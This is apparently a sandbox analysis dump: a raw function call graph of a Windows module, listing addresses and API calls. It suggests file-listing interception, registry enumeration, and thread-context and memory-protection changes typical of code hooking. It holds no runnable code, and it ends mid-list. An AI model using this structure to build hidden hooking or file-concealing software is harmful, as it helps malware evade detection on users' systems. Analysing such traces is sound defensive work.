_invalid_parameter_noinfo 23 API calls 8116->8118 8117->8076 8119 202c0aeeb43 8118->8119 8123 202c0af0d4c 8119->8123 8124 202c0af0d61 8123->8124 8126 202c0aeeb66 8123->8126 8125 202c0af13ac _invalid_parameter_noinfo 23 API calls 8124->8125 8124->8126 8125->8126 8127 202c0af0db8 8126->8127 8128 202c0af0dcd 8127->8128 8129 202c0af0de0 8127->8129 8128->8129 8130 202c0aef640 _invalid_parameter_noinfo 23 API calls 8128->8130 8129->8117 8130->8129 8132 202c0aef10d GetCPInfo 8131->8132 8141 202c0aef203 8131->8141 8133 202c0aef120 8132->8133 8132->8141 8142 202c0af1e94 8133->8142 8134 202c0ae7d30 _log10_special 8 API calls 8136 202c0aef2a2 8134->8136 8136->8091 8141->8134 8143 202c0aeeb04 23 API calls 8142->8143 8144 202c0af1ed6 8143->8144 8162 202c0aef9cc 8144->8162 8164 202c0aef9d5 MultiByteToWideChar 8162->8164 8219 202c0aed8f0 __std_exception_copy 11 API calls 8218->8219 8220 202c0aedf7d __free_lconv_mon 8219->8220 8221 202c0aed8f0 __std_exception_copy 11 API calls 8220->8221 8222 202c0aedf9f 8221->8222 8222->7866 8224 202c0aefce4 5 API calls 8223->8224 8225 202c0aeff18 8224->8225 8225->7870 8227 202c0aeebe7 8226->8227 8229 202c0aeebcc 8226->8229 8228 202c0aeebec 8227->8228 8230 202c0aefa5c WideCharToMultiByte 8227->8230 8228->8229 8232 202c0aedffc __std_exception_copy 11 API calls 8228->8232 8229->7866 8231 202c0aeec43 8230->8231 8231->8228 8233 202c0aeec4a GetLastError 8231->8233 8234 202c0aeec75 8231->8234 8232->8229 8235 202c0aedf70 11 API calls 8233->8235 8236 202c0aefa5c WideCharToMultiByte 8234->8236 8237 202c0aeec57 8235->8237 8239 202c0aeec9c 8236->8239 8238 202c0aedffc __std_exception_copy 11 API calls 8237->8238 8238->8229 8239->8229 8239->8233 8241 202c0aef91c 8240->8241 8242 202c0aeeb04 23 API calls 8241->8242 8243 202c0aef940 8242->8243 8243->7875 8880 202c0ae2f80 8881 202c0ae2fa7 8880->8881 8882 202c0ae3074 8881->8882 8883 202c0ae2fc4 PdhGetCounterInfoW 8881->8883 8883->8882 8884 202c0ae2fe6 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8883->8884 8885 202c0ae3060 GetProcessHeap HeapFree 8884->8885 8886 202c0ae3018 StrCmpW 8884->8886 8885->8882 8886->8885 8888 202c0ae302d 8886->8888 8887 202c0ae3520 12 API calls 8887->8888 8888->8885 8888->8887 8889 202c0af0180 GetProcessHeap 8890 202c0af5f7f 8891 202c0af5f97 8890->8891 8897 202c0af6002 8890->8897 8892 202c0ae8fe4 _CallSETranslator 9 API calls 8891->8892 8891->8897 8893 202c0af5fe4 8892->8893 8894 202c0ae8fe4 _CallSETranslator 9 API calls 8893->8894 8895 202c0af5ff9 8894->8895 8896 202c0aecff8 23 API calls 8895->8896 8896->8897 8244 202c0ae5c7c 8245 202c0ae5c83 8244->8245 8246 202c0ae5cb0 VirtualProtect 8245->8246 8248 202c0ae5bc0 8245->8248 8247 202c0ae5cd9 GetLastError 8246->8247 8246->8248 8247->8248 9263 202c0ae22fc GetProcessIdOfThread GetCurrentProcessId 9264 202c0ae2327 CreateFileW 9263->9264 9265 202c0ae23a2 9263->9265 9264->9265 9266 202c0ae235b WriteFile ReadFile CloseHandle 9264->9266 9266->9265 9267 202c0af3efb 9268 202c0af41a0 9267->9268 9269 202c0af3f3b 9267->9269 9270 202c0af4196 9268->9270 9274 202c0af4cb0 _log10_special 20 API calls 9268->9274 9269->9268 9271 202c0af3f6f 9269->9271 9272 202c0af4182 9269->9272 9275 202c0af4cb0 9272->9275 9274->9270 9278 202c0af4cd0 9275->9278 9279 202c0af4cea 9278->9279 9280 202c0af4ccb 9279->9280 9282 202c0af4b10 9279->9282 9280->9270 9283 202c0af4b50 _log10_special 9282->9283 9286 202c0af4bbc _log10_special 9283->9286 9293 202c0af4dd0 9283->9293 9285 202c0af4bf9 9300 202c0af5100 9285->9300 9286->9285 9287 202c0af4bc9 9286->9287 9296 202c0af49ec 9287->9296 9290 202c0af4bf7 _log10_special 9291 202c0ae7d30 _log10_special 8 API calls 9290->9291 9292 202c0af4c21 9291->9292 9292->9280 9306 202c0af4df8 9293->9306 9297 202c0af4a30 _log10_special 9296->9297 9298 202c0af4a45 9297->9298 9299 202c0af5100 _log10_special 11 API calls 9297->9299 9298->9290 9299->9298 9301 202c0af5120 9300->9301 9302 202c0af5109 9300->9302 9303 202c0aedffc __std_exception_copy 11 API calls 9301->9303 9304 202c0af5118 9302->9304 9305 202c0aedffc __std_exception_copy 11 API calls 9302->9305 9303->9304 9304->9290 9305->9304 9307 202c0af4e37 _raise_exc _clrfp 9306->9307 9308 202c0af504c RaiseException 9307->9308 9309 202c0af4df2 9308->9309 9309->9286 8898 202c0aebd78 8905 202c0aebcab __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8898->8905 8899 202c0aebd9f 8900 202c0ae8fe4 _CallSETranslator 9 API calls 8899->8900 8901 202c0aebda4 8900->8901 8902 202c0ae8fe4 _CallSETranslator 9 API calls 8901->8902 8903 202c0aebdaf __FrameHandler3::GetHandlerSearchState 8901->8903 8902->8903 8904 202c0aea448 9 API calls Is_bad_exception_allowed 8904->8905 8905->8899 8905->8903 8905->8904 8907 202c0aea470 8905->8907 8908 202c0ae8fe4 _CallSETranslator 9 API calls 8907->8908 8909 202c0aea47e 8908->8909 8909->8905 8910 202c0af6179 8911 202c0ae8fe4 _CallSETranslator 9 API calls 8910->8911 8912 202c0af6187 8911->8912 8913 202c0af6192 8912->8913 8914 202c0ae8fe4 _CallSETranslator 9 API calls 8912->8914 8914->8913 8249 202c0aeda78 8250 202c0aeda88 8249->8250 8251 202c0aed8f0 __std_exception_copy 11 API calls 8250->8251 8252 202c0aeda93 __vcrt_uninitialize_ptd 8250->8252 8251->8252 8624 202c0af1df8 8625 202c0af1e00 8624->8625 8626 202c0af1e15 8625->8626 8628 202c0af1e2e 8625->8628 8627 202c0aedffc __std_exception_copy 11 API calls 8626->8627 8629 202c0af1e1a 8627->8629 8631 202c0aeeb04 23 API calls 8628->8631 8632 202c0af1e25 8628->8632 8630 202c0aedec0 _invalid_parameter_noinfo 49 API calls 8629->8630 8630->8632 8631->8632 7575 202c0ae1ad0 7582 202c0ae1630 GetProcessHeap HeapAlloc 7575->7582 7577 202c0ae1adf 7578 202c0ae1ae6 SleepEx 7577->7578 7581 202c0ae15a0 StrCmpIW StrCmpW 7577->7581 7633 202c0ae18bc 7577->7633 7579 202c0ae1630 50 API calls 7578->7579 7579->7577 7581->7577 7650 202c0ae1268 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapAlloc 7582->7650 7584 202c0ae1658 7651 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7584->7651 7586 202c0ae1660 7652 202c0ae1268 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapAlloc 7586->7652 7588 202c0ae1669 7653 202c0ae1268 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapAlloc 7588->7653 7590 202c0ae1672 7654 202c0ae1268 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapAlloc 7590->7654 7592 202c0ae167b 7655 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7592->7655 7594 202c0ae1684 7656 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7594->7656 7596 202c0ae168d 7657 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7596->7657 7598 202c0ae1696 RegOpenKeyExW 7599 202c0ae18ae 7598->7599 7600 202c0ae16c8 RegOpenKeyExW 7598->7600 7599->7577 7601 202c0ae16f1 7600->7601 7602 202c0ae1707 RegOpenKeyExW 7600->7602 7664 202c0ae12bc RegQueryInfoKeyW 7601->7664 7604 202c0ae172b 7602->7604 7605 202c0ae1742 RegOpenKeyExW 7602->7605 7658 202c0ae104c RegQueryInfoKeyW 7604->7658 7606 202c0ae177d RegOpenKeyExW 7605->7606 7607 202c0ae1766 7605->7607 7612 202c0ae17a1 7606->7612 7613 202c0ae17b8 RegOpenKeyExW 7606->7613 7611 202c0ae12bc 16 API calls 7607->7611 7614 202c0ae1773 RegCloseKey 7611->7614 7615 202c0ae12bc 16 API calls 7612->7615 7616 202c0ae17dc 7613->7616 7617 202c0ae17f3 RegOpenKeyExW 7613->7617 7614->7606 7618 202c0ae17ae RegCloseKey 7615->7618 7619 202c0ae12bc 16 API calls 7616->7619 7620 202c0ae182e RegOpenKeyExW 7617->7620 7621 202c0ae1817 7617->7621 7618->7613 7624 202c0ae17e9 RegCloseKey 7619->7624 7622 202c0ae1869 RegOpenKeyExW 7620->7622 7623 202c0ae1852 7620->7623 7625 202c0ae104c 6 API calls 7621->7625 7628 202c0ae188d 7622->7628 7629 202c0ae18a4 RegCloseKey 7622->7629 7627 202c0ae104c 6 API calls 7623->7627 7624->7617 7626 202c0ae1824 RegCloseKey 7625->7626 7626->7620 7630 202c0ae185f RegCloseKey 7627->7630 7631 202c0ae104c 6 API calls 7628->7631 7629->7599 7630->7622 7632 202c0ae189a RegCloseKey 7631->7632 7632->7629 7678 202c0ae14a4 7633->7678 7650->7584 7651->7586 7652->7588 7653->7590 7654->7592 7655->7594 7656->7596 7657->7598 7659 202c0ae10bf 7658->7659 7660 202c0ae11b5 RegCloseKey 7658->7660 7659->7660 7661 202c0ae10cf RegEnumValueW 7659->7661 7660->7605 7662 202c0ae1125 7661->7662 7662->7660 7662->7661 7663 202c0ae114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7662->7663 7663->7662 7665 202c0ae148a RegCloseKey 7664->7665 7666 202c0ae1327 GetProcessHeap HeapAlloc 7664->7666 7665->7602 7667 202c0ae1476 GetProcessHeap HeapFree 7666->7667 7668 202c0ae1352 RegEnumValueW 7666->7668 7667->7665 7669 202c0ae13a5 7668->7669 7669->7667 7669->7668 7671 202c0ae141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7669->7671 7672 202c0ae13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7669->7672 7673 202c0ae1534 7669->7673 7671->7669 7672->7671 7674 202c0ae1584 7673->7674 7677 202c0ae154e 7673->7677 7674->7669 7675 202c0ae156d StrCmpW 7675->7677 7676 202c0ae1565 StrCmpIW 7676->7677 7677->7674 7677->7675 7677->7676 7679 202c0ae14e6 GetProcessHeap HeapFree GetProcessHeap HeapFree 7678->7679 7680 202c0ae14c6 GetProcessHeap HeapFree 7678->7680 7680->7679 7680->7680 8633 202c0ae3fd0 8636 202c0ae3f1d _invalid_parameter_noinfo 8633->8636 8634 202c0ae3f87 8635 202c0ae3f6d VirtualQuery 8635->8634 8635->8636 8636->8634 8636->8635 8637 202c0ae3fd2 GetLastError 8636->8637 8637->8634 8637->8636 8915 202c0aeb750 8916 202c0aeb77d __except_validate_context_record 8915->8916 8917 202c0ae8fe4 _CallSETranslator 9 API calls 8916->8917 8918 202c0aeb782 8917->8918 8920 202c0aeb7dc 8918->8920 8923 202c0aeb86a 8918->8923 8929 202c0aeb830 8918->8929 8919 202c0aeb8d8 8919->8929 8957 202c0aeaed0 8919->8957 8921 202c0aeb857 8920->8921 8920->8929 8930 202c0aeb7fe __FrameHandler3::FrameUnwindToEmptyState 8920->8930 8944 202c0aea04c 8921->8944 8926 202c0aeb889 8923->8926 8951 202c0aea448 8923->8951 8926->8919 8926->8929 8954 202c0aea45c 8926->8954 8927 202c0aeb981 8930->8927 8932 202c0aebc5c 8930->8932 8933 202c0aea448 Is_bad_exception_allowed 9 API calls 8932->8933 8934 202c0aebc8b __FrameHandler3::FrameUnwindToEmptyState 8933->8934 8935 202c0ae8fe4 _CallSETranslator 9 API calls 8934->8935 8940 202c0aebca8 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8935->8940 8936 202c0aebd9f 8937 202c0ae8fe4 _CallSETranslator 9 API calls 8936->8937 8938 202c0aebda4 8937->8938 8939 202c0ae8fe4 _CallSETranslator 9 API calls 8938->8939 8941 202c0aebdaf __FrameHandler3::GetHandlerSearchState 8938->8941 8939->8941 8940->8936 8940->8941 8942 202c0aea448 9 API calls Is_bad_exception_allowed 8940->8942 8943 202c0aea470 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8940->8943 8941->8929 8942->8940 8943->8940 9014 202c0aea0b0 8944->9014 8946 202c0aea06b __FrameHandler3::GetHandlerSearchState 9018 202c0ae9fbc 8946->9018 8949 202c0aebc5c __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8950 202c0aea0a0 8949->8950 8950->8929 8952 202c0ae8fe4 _CallSETranslator 9 API calls 8951->8952 8953 202c0aea451 8952->8953 8953->8926 8955 202c0ae8fe4 _CallSETranslator 9 API calls 8954->8955 8956 202c0aea465 8955->8956 8956->8919 9022 202c0aebde8 8957->9022 8959 202c0aeb397 8960 202c0aeb2e8 8960->8959 9001 202c0aeb2e6 8960->9001 9075 202c0aeb3a0 8960->9075 8961 202c0aeb016 8961->8960 9005 202c0aeb04e 8961->9005 8962 202c0ae8fe4 _CallSETranslator 9 API calls 8964 202c0aeb32a 8962->8964 8964->8959 8967 202c0ae7d30 _log10_special 8 API calls 8964->8967 8965 202c0ae8fe4 _CallSETranslator 9 API calls 8969 202c0aeaf7d 8965->8969 8970 202c0aeb33d 8967->8970 8968 202c0aeb215 8971 202c0aea448 Is_bad_exception_allowed 9 API calls 8968->8971 8972 202c0aeb236 8968->8972 8968->9001 8969->8964 8973 202c0ae8fe4 _CallSETranslator 9 API calls 8969->8973 8970->8929 8971->8972 8977 202c0aeb258 8972->8977 8972->9001 9068 202c0aea020 8972->9068 8974 202c0aeaf8d 8973->8974 8976 202c0ae8fe4 _CallSETranslator 9 API calls 8974->8976 8978 202c0aeaf96 8976->8978 8979 202c0aeb26e 8977->8979 8980 202c0aeb37a 8977->8980 8977->9001 9033 202c0aea488 8978->9033 8981 202c0aeb279 8979->8981 8984 202c0aea448 Is_bad_exception_allowed 9 API calls 8979->8984 8982 202c0ae8fe4 _CallSETranslator 9 API calls 8980->8982 8988 202c0aebe80 9 API calls 8981->8988 8985 202c0aeb380 8982->8985 8984->8981 8987 202c0ae8fe4 _CallSETranslator 9 API calls 8985->8987 8989 202c0aeb389 8987->8989 8990 202c0aeb290 8988->8990 8992 202c0aecff8 23 API calls 8989->8992 8994 202c0aea0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 8990->8994 8990->9001 8991 202c0ae8fe4 _CallSETranslator 9 API calls 8993 202c0aeafd8 8991->8993 8992->8959 8993->8961 8997 202c0ae8fe4 _CallSETranslator 9 API calls 8993->8997 8996 202c0aeb2aa 8994->8996 8995 202c0aea45c 9 API calls 8995->9005 9072 202c0aea2b4 RtlUnwindEx 8996->9072 8999 202c0aeafe4 8997->8999 9002 202c0ae8fe4 _CallSETranslator 9 API calls 8999->9002 9001->8962 9003 202c0aeafed 9002->9003 9036 202c0aebe80 9003->9036 9005->8968 9005->8995 9047 202c0aeb610 9005->9047 9061 202c0aeadfc 9005->9061 9008 202c0aeb001 9043 202c0aebf70 9008->9043 9010 202c0aeb374 9011 202c0aecff8 23 API calls 9010->9011 9011->8980 9012 202c0aeb009 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9012->9010 9013 202c0ae8e38 Concurrency::cancel_current_task 2 API calls 9012->9013 9013->9010 9017 202c0aea0de __FrameHandler3::GetHandlerSearchState 9014->9017 9015 202c0aea150 9015->8946 9016 202c0aea108 RtlLookupFunctionEntry 9016->9017 9017->9015 9017->9016 9019 202c0aea007 9018->9019 9021 202c0ae9fdc 9018->9021 9019->8949 9020 202c0ae8fe4 _CallSETranslator 9 API calls 9020->9021 9021->9019 9021->9020 9023 202c0aebe0d __FrameHandler3::GetHandlerSearchState 9022->9023 9024 202c0aea0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 9023->9024 9025 202c0aebe22 9024->9025 9087 202c0aeaa58 9025->9087 9028 202c0aebe57 9029 202c0aeaa58 __GetUnwindTryBlock RtlLookupFunctionEntry 9028->9029 9031 202c0aeaf31 9029->9031 9030 202c0aebe34 __FrameHandler3::GetHandlerSearchState 9090 202c0aeaa90 9030->9090 9031->8959 9031->8961 9031->8965 9034 202c0ae8fe4 _CallSETranslator 9 API calls 9033->9034 9035 202c0aea496 9034->9035 9035->8959 9035->8991 9037 202c0aebf67 9036->9037 9042 202c0aebeab 9036->9042 9038 202c0aeaffd 9038->8961 9038->9008 9039 202c0aea45c 9 API calls 9039->9042 9040 202c0aea448 Is_bad_exception_allowed 9 API calls 9040->9042 9041 202c0aeb610 9 API calls 9041->9042 9042->9038 9042->9039 9042->9040 9042->9041 9045 202c0aebf8d Is_bad_exception_allowed 9043->9045 9046 202c0aebfdd 9043->9046 9044 202c0aea448 9 API calls Is_bad_exception_allowed 9044->9045 9045->9044 9045->9046 9046->9012 9048 202c0aeb63d 9047->9048 9060 202c0aeb6cc 9047->9060 9049 202c0aea448 Is_bad_exception_allowed 9 API calls 9048->9049 9050 202c0aeb646 9049->9050 9051 202c0aea448 Is_bad_exception_allowed 9 API calls 9050->9051 9052 202c0aeb65f 9050->9052 9050->9060 9051->9052 9053 202c0aeb68b 9052->9053 9054 202c0aea448 Is_bad_exception_allowed 9 API calls 9052->9054 9052->9060 9055 202c0aea45c 9 API calls 9053->9055 9054->9053 9056 202c0aeb69f 9055->9056 9057 202c0aea448 Is_bad_exception_allowed 9 API calls 9056->9057 9058 202c0aeb6b8 9056->9058 9056->9060 9057->9058 9059 202c0aea45c 9 API calls 9058->9059 9059->9060 9060->9005 9062 202c0aea0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 9061->9062 9063 202c0aeae39 9062->9063 9064 202c0aea448 Is_bad_exception_allowed 9 API calls 9063->9064 9065 202c0aeae71 9064->9065 9066 202c0aea2b4 9 API calls 9065->9066 9067 202c0aeaeb5 9066->9067 9067->9005 9069 202c0aea034 __FrameHandler3::GetHandlerSearchState 9068->9069 9070 202c0ae9fbc __FrameHandler3::ExecutionInCatch 9 API calls 9069->9070 9071 202c0aea03e 9070->9071 9071->8977 9073 202c0ae7d30 _log10_special 8 API calls 9072->9073 9074 202c0aea3ae 9073->9074 9074->9001 9076 202c0aeb3d9 9075->9076 9081 202c0aeb5ec 9075->9081 9077 202c0ae8fe4 _CallSETranslator 9 API calls 9076->9077 9078 202c0aeb3de 9077->9078 9079 202c0aeb3fd EncodePointer 9078->9079 9085 202c0aeb450 9078->9085 9080 202c0ae8fe4 _CallSETranslator 9 API calls 9079->9080 9082 202c0aeb40d 9080->9082 9081->9001 9082->9085 9093 202c0ae9f68 9082->9093 9084 202c0aea448 9 API calls Is_bad_exception_allowed 9084->9085 9085->9081 9085->9084 9086 202c0aeadfc 19 API calls 9085->9086 9086->9085 9088 202c0aea0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 9087->9088 9089 202c0aeaa6b 9088->9089 9089->9028 9089->9030 9091 202c0aea0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 9090->9091 9092 202c0aeaaaa 9091->9092 9092->9031 9094 202c0ae8fe4 _CallSETranslator 9 API calls 9093->9094 9095 202c0ae9f94 9094->9095 9095->9085 7681 202c0ae25cc NtQueryDirectoryFileEx 7682 202c0ae2656 _invalid_parameter_noinfo 7681->7682 7694 202c0ae277c 7681->7694 7683 202c0ae26ad GetFileType 7682->7683 7682->7694 7684 202c0ae26d1 7683->7684 7685 202c0ae26bb StrCpyW 7683->7685 7697 202c0ae19e0 GetFinalPathNameByHandleW 7684->7697 7686 202c0ae26e0 7685->7686 7688 202c0ae26ea 7686->7688 7691 202c0ae2781 7686->7691 7688->7694 7702 202c0ae3c40 7688->7702 7705 202c0ae32d8 StrCmpIW 7688->7705 7709 202c0ae1ce0 7688->7709 7689 202c0ae3c40 StrCmpNIW 7689->7691 7691->7689 7692 202c0ae32d8 4 API calls 7691->7692 7693 202c0ae1ce0 2 API calls 7691->7693 7691->7694 7692->7691 7693->7691 7698 202c0ae1a0a StrCmpNIW 7697->7698 7699 202c0ae1a49 7697->7699 7698->7699 7700 202c0ae1a24 lstrlenW 7698->7700 7699->7686 7700->7699 7701 202c0ae1a36 StrCpyW 7700->7701 7701->7699 7703 202c0ae3c4d StrCmpNIW 7702->7703 7704 202c0ae3c62 7702->7704 7703->7704 7704->7688 7706 202c0ae3321 PathCombineW 7705->7706 7707 202c0ae330a StrCpyW StrCatW 7705->7707 7708 202c0ae332a 7706->7708 7707->7708 7708->7688 7710 202c0ae1cf7 7709->7710 7712 202c0ae1d00 7709->7712 7711 202c0ae1534 2 API calls 7710->7711 7711->7712 7712->7688 8638 202c0ae8bcc 8645 202c0ae912c 8638->8645 8641 202c0ae8bd9 8647 202c0ae9134 8645->8647 8648 202c0ae9165 8647->8648 8649 202c0ae8bd5 8647->8649 8662 202c0aea7a4 8647->8662 8650 202c0ae9174 __vcrt_uninitialize_locks DeleteCriticalSection 8648->8650 8649->8641 8651 202c0ae90c0 8649->8651 8650->8649 8667 202c0aea678 8651->8667 8663 202c0aea528 __vcrt_InitializeCriticalSectionEx 5 API calls 8662->8663 8664 202c0aea7da 8663->8664 8665 202c0aea7ef InitializeCriticalSectionAndSpinCount 8664->8665 8666 202c0aea7e4 8664->8666 8665->8666 8666->8647 8668 202c0aea528 __vcrt_InitializeCriticalSectionEx 5 API calls 8667->8668 8669 202c0aea69d TlsAlloc 8668->8669 9310 202c0ae7ecc 9317 202c0ae8bf4 9310->9317 9313 202c0ae7ed9 9318 202c0ae9000 _CallSETranslator 9 API calls 9317->9318 9319 202c0ae7ed5 9318->9319 9319->9313 9320 202c0aecf8c 9319->9320 9321 202c0aed8f0 __std_exception_copy 11 API calls 9320->9321 9322 202c0ae7ee2 9321->9322 9322->9313 9323 202c0ae8c08 9322->9323 9326 202c0ae8f9c 9323->9326 9325 202c0ae8c11 9325->9313 9327 202c0ae8fad 9326->9327 9331 202c0ae8fc2 __std_exception_copy 9326->9331 9328 202c0aea708 _CallSETranslator 6 API calls 9327->9328 9329 202c0ae8fb2 9328->9329 9332 202c0aea750 9329->9332 9331->9325 9333 202c0aea528 __vcrt_InitializeCriticalSectionEx 5 API calls 9332->9333 9334 202c0aea77e 9333->9334 9335 202c0aea790 TlsSetValue 9334->9335 9336 202c0aea788 9334->9336 9335->9336 9336->9331 8253 202c0aefc4c 8254 202c0aefc6e 8253->8254 8255 202c0aefc8b 8253->8255 8254->8255 8256 202c0aefc7c 8254->8256 8259 202c0aefc95 8255->8259 8262 202c0af2408 8255->8262 8257 202c0aedffc __std_exception_copy 11 API calls 8256->8257 8261 202c0aefc81 _invalid_parameter_noinfo 8257->8261 8269 202c0af2444 8259->8269 8263 202c0af2411 8262->8263 8264 202c0af242a HeapSize 8262->8264 8265 202c0aedffc __std_exception_copy 11 API calls 8263->8265 8266 202c0af2416 8265->8266 8267 202c0aedec0 _invalid_parameter_noinfo 49 API calls 8266->8267 8268 202c0af2421 8267->8268 8268->8259 8270 202c0af2459 8269->8270 8271 202c0af2463 8269->8271 8272 202c0aed35c 12 API calls 8270->8272 8273 202c0af2468 8271->8273 8279 202c0af246f __std_exception_copy 8271->8279 8277 202c0af2461 8272->8277 8274 202c0aee094 __free_lconv_mon 11 API calls 8273->8274 8274->8277 8275 202c0af2475 8278 202c0aedffc __std_exception_copy 11 API calls 8275->8278 8276 202c0af24a2 HeapReAlloc 8276->8277 8276->8279 8277->8261 8278->8277 8279->8275 8279->8276 8280 202c0aec1ac __std_exception_copy 2 API calls 8279->8280 8280->8279 8671 202c0ae2bc8 8672 202c0ae2c39 8671->8672 8673 202c0ae2f5c 8672->8673 8674 202c0ae2c65 GetModuleHandleA 8672->8674 8675 202c0ae2c89 8674->8675 8676 202c0ae2c77 GetProcAddress 8674->8676 8675->8673 8677 202c0ae2cb0 StrCmpNIW 8675->8677 8676->8675 8677->8673 8681 202c0ae2cd5 8677->8681 8678 202c0ae193c 6 API calls 8678->8681 8679 202c0ae2de7 lstrlenW 8679->8681 8680 202c0ae2e91 lstrlenW 8680->8681 8681->8673 8681->8678 8681->8679 8681->8680 8682 202c0ae3c40 StrCmpNIW 8681->8682 8683 202c0ae1c08 StrCmpIW StrCmpW 8681->8683 8682->8681 8683->8681 8281 202c0af6245 8282 202c0af625e 8281->8282 8283 202c0af6254 8281->8283 8285 202c0aed340 LeaveCriticalSection 8283->8285 9337 202c0ae60e0 9338 202c0ae60ed 9337->9338 9339 202c0ae60f9 9338->9339 9345 202c0ae620a 9338->9345 9340 202c0ae617d 9339->9340 9341 202c0ae6156 SetThreadContext 9339->9341 9341->9340 9342 202c0ae6231 VirtualProtect FlushInstructionCache 9342->9345 9343 202c0ae62ee 9344 202c0ae630e 9343->9344 9347 202c0ae47d0 VirtualFree 9343->9347 9346 202c0ae51e0 3 API calls 9344->9346 9345->9342 9345->9343 9350 202c0ae6313 9346->9350 9347->9344 9348 202c0ae6367 9351 202c0ae7d30 _log10_special 8 API calls 9348->9351 9349 202c0ae6327 ResumeThread 9349->9350 9350->9348 9350->9349 9352 202c0ae63af 9351->9352 9353 202c0af60dd 9354 202c0aea3f4 __CxxCallCatchBlock 9 API calls 9353->9354 9355 202c0af60f0 9354->9355 9360 202c0ae8cb8 __CxxCallCatchBlock 9 API calls 9355->9360 9361 202c0af612f __CxxCallCatchBlock 9355->9361 9356 202c0ae8fe4 _CallSETranslator 9 API calls 9357 202c0af6143 9356->9357 9358 202c0ae8fe4 _CallSETranslator 9 API calls 9357->9358 9359 202c0af6153 9358->9359 9360->9361 9361->9356 8684 202c0af03dc 8687 202c0af03e8 8684->8687 8686 202c0af040f 8687->8686 8688 202c0af260c 8687->8688 8689 202c0af2611 8688->8689 8690 202c0af264c 8688->8690 8691 202c0af2644 8689->8691 8692 202c0af2632 DeleteCriticalSection 8689->8692 8690->8687 8693 202c0aee094 __free_lconv_mon 11 API calls 8691->8693 8692->8691 8692->8692 8693->8690 9362 202c0aecedc 9363 202c0aecef5 9362->9363 9365 202c0aecf0d 9362->9365 9364 202c0aee094 __free_lconv_mon 11 API calls 9363->9364 9363->9365 9364->9365 9366 202c0af0cd8 9367 202c0af0ce3 9366->9367 9375 202c0af35d8 9367->9375 9388 202c0aed2ec EnterCriticalSection 9375->9388 9389 202c0af5f31 __scrt_dllmain_exception_filter 9096 202c0af53b0 9106 202c0ae8960 9096->9106 9098 202c0af53d8 9100 202c0ae8fe4 _CallSETranslator 9 API calls 9101 202c0af53e8 9100->9101 9102 202c0ae8fe4 _CallSETranslator 9 API calls 9101->9102 9103 202c0af53f1 9102->9103 9104 202c0aecff8 23 API calls 9103->9104 9105 202c0af53fa 9104->9105 9107 202c0ae8990 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9106->9107 9108 202c0ae8a91 9107->9108 9109 202c0ae8a54 RtlUnwindEx 9107->9109 9108->9098 9108->9100 9109->9107 9390 202c0af5330 9391 202c0af5368 __GSHandlerCheckCommon 9390->9391 9392 202c0af5394 9391->9392 9394 202c0aea4a0 9391->9394 9395 202c0ae8fe4 _CallSETranslator 9 API calls 9394->9395 9396 202c0aea4ca 9395->9396 9397 202c0ae8fe4 _CallSETranslator 9 API calls 9396->9397 9398 202c0aea4d7 9397->9398 9399 202c0ae8fe4 _CallSETranslator 9 API calls 9398->9399 9400 202c0aea4e0 9399->9400 9400->9392 8694 202c0ae2a2c 8696 202c0ae2a80 8694->8696 8695 202c0ae2a9b 8696->8695 8698 202c0ae33c4 8696->8698 8699 202c0ae345a 8698->8699 8701 202c0ae33e9 8698->8701 8699->8695 8700 202c0ae3c40 StrCmpNIW 8700->8701 8701->8699 8701->8700 8702 202c0ae1d14 StrCmpIW StrCmpW 8701->8702 8702->8701 8295 202c0ae3ea9 8300 202c0ae3df6 _invalid_parameter_noinfo 8295->8300 8296 202c0ae3e46 VirtualQuery 8299 202c0ae3e60 8296->8299 8296->8300 8297 202c0ae3e7a VirtualAlloc 8298 202c0ae3eab GetLastError 8297->8298 8297->8299 8298->8300 8300->8296 8300->8297 8300->8299 8301 202c0ae5ca9 8302 202c0ae5cb0 VirtualProtect 8301->8302 8303 202c0ae5cd9 GetLastError 8302->8303 8304 202c0ae5bc0 8302->8304 8303->8304 8703 202c0ae5624 8704 202c0ae562a 8703->8704 8715 202c0ae7c5c 8704->8715 8708 202c0ae568e 8710 202c0ae5727 _invalid_parameter_noinfo 8710->8708 8712 202c0ae58ad 8710->8712 8728 202c0ae7830 8710->8728 8711 202c0ae59ab 8712->8711 8713 202c0ae5a27 VirtualProtect 8712->8713 8713->8708 8714 202c0ae5a53 GetLastError 8713->8714 8714->8708 8719 202c0ae7c67 8715->8719 8716 202c0ae566d 8716->8708 8724 202c0ae40b0 8716->8724 8717 202c0aec1ac __std_exception_copy 2 API calls 8717->8719 8718 202c0ae7c86 8720 202c0ae7c91 8718->8720 8734 202c0ae8478 8718->8734 8719->8716 8719->8717 8719->8718 8738 202c0ae8498 8720->8738 8725 202c0ae40cd 8724->8725 8727 202c0ae413c _invalid_parameter_noinfo 8725->8727 8747 202c0ae4320 8725->8747 8727->8710 8729 202c0ae7877 8728->8729 8772 202c0ae7600 8729->8772 8732 202c0ae7d30 _log10_special 8 API calls 8733 202c0ae78a1 8732->8733 8733->8710 8735 202c0ae8486 std::bad_alloc::bad_alloc 8734->8735 8742 202c0ae8e38 8735->8742 8737 202c0ae8497 8739 202c0ae84a6 std::bad_alloc::bad_alloc 8738->8739 8740 202c0ae8e38 Concurrency::cancel_current_task 2 API calls 8739->8740 8741 202c0ae7c97 8740->8741 8743 202c0ae8e57 8742->8743 8744 202c0ae8e80 